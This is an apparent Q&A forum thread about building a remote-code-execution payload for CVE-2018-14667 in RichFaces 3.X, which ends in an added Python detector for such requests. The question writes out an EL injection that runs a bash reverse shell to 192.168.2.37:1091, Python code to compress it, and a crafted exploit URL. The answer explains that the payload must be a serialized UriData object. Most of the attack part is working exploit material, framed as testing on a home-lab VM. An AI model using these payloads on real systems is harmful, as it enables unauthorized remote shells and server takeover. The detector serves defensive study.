CVE-2018-14667; generating a valid payload for RichFaces 3.X

I am currently running on a virtual machine JBoss 5.1.0GA + RichFaces 3.X + photoalbum demo which makes me vulnerable (only accessible from my LAN) to CVE-2018-14667. I have tested the payload mentioned in https://seclists.org/fulldisclosure/2018/Nov/47 and it works fine. Now, I am trying to figure out how I could generate my own payload in order to obtain a reverse shell.

Here's the information I found so far for generating my own payload:

this needs to be compressed via zlib:

#{request.getClass().getClassLoader().loadClass(\"java.lang.Runtime\").getMethod(\"getRuntime\").invoke(null).exec(\"bash -i > /dev/tcp/192.168.2.37/1091 0>&1 2>&1\")}

How to compress with zlib:

import zlib
import binascii

# Python 3: zlib.compress() needs bytes, and hexlify() returns bytes, so use a bytes literal and decode for printing
data = b'#{request.getClass().getClassLoader().loadClass(\"java.lang.Runtime\").getMethod(\"getRuntime\").invoke(null).exec(\"bash -i > /dev/tcp/192.168.2.37/1091 0>&1 2>&1\")}'

compressed_data = zlib.compress(data, 2)

print('Original data: ' + data.decode())
print('Compressed data: ' + binascii.hexlify(compressed_data).decode())

Then after, encode the compressed data with base64url on:

https://simplycalc.com/base64url-encode.php

Then test it out like this:

http://192.168.2.37:8181/photoalbum/a4j/s/3_3_3.Finalorg.ajax4jsf.resource.UserResource/n/n/DATA/Nzg1ZTQ1OGFjZDBhMDIyMTE0NDY1ZjQ1MGM0MjE3NWQ0NzgzNmEzNmIzNjk1YjliZGVjMGM2Y2I4YzhkNjk4ZDNmMDRkMWJiMjcwNWI1ZjkzODljZjMyZDllMzNkZTMzYzYwNDAzYTZiZGQzMzEzMmZlYzM0M2QwMDZlNzJhNWM4NTZmYTQxNzVkMzQzOGVkMDczODY1OWZlYzE1ZTllNzdmYzQzNDA2YzM2OGM1YmZiN2JlODQwOTk5Y2ZjZTcxYzAwN2Y2OGM5ZTc1MWNjOWNhOTI4ZTA4ODM0NWE0ZmUyNjY0YWI0MDZlNzZhMDYwYmQxNWIyNjkyNTY5YmFhNTI0YWEwZWU1YWYzN2MzYzEzMzg1

Unfortunately, every time I get an HTTP status code 500 saying:

javax.faces.FacesException: Error decode resource data

I have been trying to figure this out all night but without success, so I decided to ask here; maybe I could find a solution to my current issue.

Any help would be very appreciated.

Thanks

--- UPDATES ---

You can find a PoC generator written in Java here:

https://pastebin.com/raw/YRKdatWv

1) Name it Main.java
2) javac Main.java

Unfortunately, I didn't have luck on my side:

Main.java:1: error: package com.sun.facelets.el does not exist
import com.sun.facelets.el.TagMethodExpression;
                          ^
Main.java:2: error: package com.sun.facelets.el does not exist
import com.sun.facelets.el.TagValueExpression;
                          ^
Main.java:3: error: package com.sun.facelets.tag does not exist
import com.sun.facelets.tag.Location;
                           ^
Main.java:4: error: package com.sun.facelets.tag does not exist
import com.sun.facelets.tag.TagAttribute;
                           ^
Main.java:5: error: package org.ajax4jsf.resource does not exist
import org.ajax4jsf.resource.UserResource;
                            ^
Main.java:6: error: package org.ajax4jsf.util.base64 does not exist
import org.ajax4jsf.util.base64.URL64Codec;
                               ^
Main.java:7: error: package org.jboss.el does not exist
import org.jboss.el.MethodExpressionImpl;
                   ^
Main.java:8: error: package org.jboss.el does not exist
import org.jboss.el.ValueExpressionImpl;
                   ^
Main.java:9: error: package org.jboss.el.parser does not exist
import org.jboss.el.parser.*;
^
Main.java:10: error: package org.jboss.seam.core does not exist
import org.jboss.seam.core.Expressions;
                          ^
Main.java:11: error: package org.richfaces.ui.application does not exist
import org.richfaces.ui.application.StateMethodExpressionWrapper;
                                   ^
Main.java:21: error: package javax.el does not exist
import javax.el.MethodExpression;
               ^
Main.java:22: error: package javax.faces.context does not exist
import javax.faces.context.FacesContext;
                          ^
Main.java:43: error: cannot find symbol
        MethodExpressionImpl mei = new MethodExpressionImpl(pocEL, null, null, null, null, new Class[]{OutputStream.class, Object.class});
        ^
  symbol:   class MethodExpressionImpl
  location: class Main
Main.java:43: error: cannot find symbol
        MethodExpressionImpl mei = new MethodExpressionImpl(pocEL, null, null, null, null, new Class[]{OutputStream.class, Object.class});
                                       ^
  symbol:   class MethodExpressionImpl
  location: class Main
Main.java:44: error: cannot find symbol
        ValueExpressionImpl vei = new ValueExpressionImpl(pocEL, null, null, null, MethodExpression.class);
        ^
  symbol:   class ValueExpressionImpl
  location: class Main
Main.java:44: error: cannot find symbol
        ValueExpressionImpl vei = new ValueExpressionImpl(pocEL, null, null, null, MethodExpression.class);
                                      ^
  symbol:   class ValueExpressionImpl
  location: class Main
Main.java:44: error: cannot find symbol
        ValueExpressionImpl vei = new ValueExpressionImpl(pocEL, null, null, null, MethodExpression.class);
                                                                                   ^
  symbol:   class MethodExpression
  location: class Main
Main.java:45: error: cannot find symbol
        StateMethodExpressionWrapper smew = new StateMethodExpressionWrapper(mei, vei);
        ^
  symbol:   class StateMethodExpressionWrapper
  location: class Main
Main.java:45: error: cannot find symbol
        StateMethodExpressionWrapper smew = new StateMethodExpressionWrapper(mei, vei);
                                                ^
  symbol:   class StateMethodExpressionWrapper
  location: class Main
Main.java:46: error: cannot find symbol
        Location location = new Location("/richfaces/mediaOutput/examples/jpegSample.xhtml", 0, 0);
        ^
  symbol:   class Location
  location: class Main
Main.java:46: error: cannot find symbol
        Location location = new Location("/richfaces/mediaOutput/examples/jpegSample.xhtml", 0, 0);
                                ^
  symbol:   class Location
  location: class Main
Main.java:47: error: cannot find symbol
        TagAttribute tagAttribute = new TagAttribute(location, "", "", "@11214", "createContent="+pocEL);
        ^
  symbol:   class TagAttribute
  location: class Main
Main.java:47: error: cannot find symbol
        TagAttribute tagAttribute = new TagAttribute(location, "", "", "@11214", "createContent="+pocEL);
                                        ^
  symbol:   class TagAttribute
  location: class Main
Main.java:48: error: cannot find symbol
        TagMethodExpression tagMethodExpression = new TagMethodExpression(tagAttribute, smew);
        ^
  symbol:   class TagMethodExpression
  location: class Main
Main.java:48: error: cannot find symbol
        TagMethodExpression tagMethodExpression = new TagMethodExpression(tagAttribute, smew);
                                                      ^
  symbol:   class TagMethodExpression
  location: class Main
Main.java:51: error: cannot find symbol
        Constructor ct = cls.getDeclaredConstructor(FacesContext.class, Object.class);
                                                    ^
  symbol:   class FacesContext
  location: class Main
Main.java:59: error: cannot find symbol
        TagAttribute tag = new TagAttribute(location, "", "", "just", "modified="+pocEL);
        ^
  symbol:   class TagAttribute
  location: class Main
Main.java:59: error: cannot find symbol
        TagAttribute tag = new TagAttribute(location, "", "", "just", "modified="+pocEL);
                               ^
  symbol:   class TagAttribute
  location: class Main
Main.java:60: error: cannot find symbol
        ValueExpressionImpl ve = new ValueExpressionImpl(pocEL+" modified", null, null, null, Date.class);
        ^
  symbol:   class ValueExpressionImpl
  location: class Main
Main.java:60: error: cannot find symbol
        ValueExpressionImpl ve = new ValueExpressionImpl(pocEL+" modified", null, null, null, Date.class);
                                     ^
  symbol:   class ValueExpressionImpl
  location: class Main
Main.java:61: error: cannot find symbol
        TagValueExpression tagValueExpression = new TagValueExpression(tag, ve);
        ^
  symbol:   class TagValueExpression
  location: class Main
Main.java:61: error: cannot find symbol
        TagValueExpression tagValueExpression = new TagValueExpression(tag, ve);
                                                    ^
  symbol:   class TagValueExpression
  location: class Main
Main.java:65: error: cannot find symbol
        TagAttribute tag2 = new TagAttribute(location, "", "", "have_fun", "expires="+pocEL);
        ^
  symbol:   class TagAttribute
  location: class Main
Main.java:65: error: cannot find symbol
        TagAttribute tag2 = new TagAttribute(location, "", "", "have_fun", "expires="+pocEL);
                                ^
  symbol:   class TagAttribute
  location: class Main
Main.java:66: error: cannot find symbol
        ValueExpressionImpl ve2 = new ValueExpressionImpl(pocEL+" expires", null, null, null, Date.class);
        ^
  symbol:   class ValueExpressionImpl
  location: class Main
Main.java:66: error: cannot find symbol
        ValueExpressionImpl ve2 = new ValueExpressionImpl(pocEL+" expires", null, null, null, Date.class);
                                      ^
  symbol:   class ValueExpressionImpl
  location: class Main
Main.java:67: error: cannot find symbol
        TagValueExpression tagValueExpression2 = new TagValueExpression(tag2, ve2);
        ^
  symbol:   class TagValueExpression
  location: class Main
Main.java:67: error: cannot find symbol
        TagValueExpression tagValueExpression2 = new TagValueExpression(tag2, ve2);
                                                     ^
  symbol:   class TagValueExpression
  location: class Main
Main.java:71: error: package UserResource does not exist
        UserResource.UriData uriData = new UserResource.UriData();
                    ^
Main.java:71: error: package UserResource does not exist
        UserResource.UriData uriData = new UserResource.UriData();
                                                       ^
Main.java:103: error: cannot find symbol
        byte[] dataArray = URL64Codec.encodeBase64(zipsrc);
                           ^
  symbol:   variable URL64Codec
  location: class Main
42 errors
Gerald asked Nov 06 '22 23:11


1 Answer

You need to compile and execute the POC generator with org.ajax4jsf:ajax4jsf, org.jboss.el:jboss-el, org.jboss.seam:jboss-seam, org.richfaces:ui, com.sun.facelets:jsf-facelets and probably some transitive dependencies on the classpath.

Your snippet is not working because it's not just the Base64 encoded EL expression that should be in the payload. Instead, you should serialize a specially constructed UriData instance that contains the EL expression using an ObjectOutputStream. More information about Java object serialization can be found at the Javadoc for Serializable.

It will be hard if not impossible for you to mimic this particular Java serialization in Python. You could try using javaobj-py3 for this. I am not going to write the actual code for it, it's no exercise to me :)

Jan-Willem Gmelig Meyling answered Nov 15 '22 10:11
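An added defender-side check, not part of the question or answer above and not RichFaces code: it takes a UserResource request path in the form the question uses, base64url-decodes and inflates the DATA segment, and reports whether the payload is a serialized Java object carrying an EL expression that reaches into class loading or Runtime.exec, which is the shape the answer describes. It assumes standard RFC 4648 base64url (RichFaces' own URL64Codec alphabet may differ) and builds its own constructed sample data; the payload bytes here are not a real UriData.

```python
import base64
import re
import zlib

# Request-path shape from the question: .../UserResource/n/n/DATA/<blob>
DATA_SEGMENT = re.compile(r"UserResource/[^/]*/[^/]*/DATA/([A-Za-z0-9_\-=!]+)")
JAVA_SERIAL_MAGIC = b"\xac\xed\x00\x05"       # ObjectOutputStream stream header
EL_PATTERN = re.compile(rb"#\{.*?\}", re.S)
DANGEROUS_EL = re.compile(r"getClassLoader|loadClass|Runtime|\.exec\(")  # from the question's EL

def decode_data_segment(path):
    """Base64url-decode and zlib-inflate the DATA segment, or return None.
    Assumes RFC 4648 base64url; RichFaces' URL64Codec may differ (assumption)."""
    m = DATA_SEGMENT.search(path)
    if not m:
        return None
    blob = m.group(1)
    blob += "=" * (-len(blob) % 4)          # restore stripped padding
    try:
        return zlib.decompress(base64.urlsafe_b64decode(blob))
    except (ValueError, zlib.error):
        return None

def inspect_request(path):
    """Findings for one request path: decodable?, serialized object?, EL strings found."""
    data = decode_data_segment(path)
    if data is None:
        return {"decodable": False, "serialized": False, "el_expressions": []}
    return {
        "decodable": True,
        "serialized": data.startswith(JAVA_SERIAL_MAGIC),
        "el_expressions": [e.decode("latin-1") for e in EL_PATTERN.findall(data)],
    }

def is_suspicious(path):
    """Flag a serialized payload whose EL touches class loading or process execution."""
    f = inspect_request(path)
    return f["serialized"] and any(DANGEROUS_EL.search(e) for e in f["el_expressions"])

def build_sample_path(el):
    """Constructed test input only: stream magic + marker + EL text, not a real UriData."""
    body = JAVA_SERIAL_MAGIC + b"UriData" + el.encode()
    blob = base64.urlsafe_b64encode(zlib.compress(body)).decode().rstrip("=")
    return "/photoalbum/a4j/s/3_3_3.Finalorg.ajax4jsf.resource.UserResource/n/n/DATA/" + blob

# Constructed samples: the question's EL with a placeholder command, and a plain bean call.
MALICIOUS_EL = ('#{request.getClass().getClassLoader().loadClass("java.lang.Runtime")'
                '.getMethod("getRuntime").invoke(null).exec("CONSTRUCTED_COMMAND")}')
BENIGN_EL = "#{paintBean.paint}"
```

Run `inspect_request` over access-log paths for the `/a4j/s/` prefix; a legitimate UriData also serializes and may carry a simple EL, so the signal is the reflective identifiers, not serialization alone.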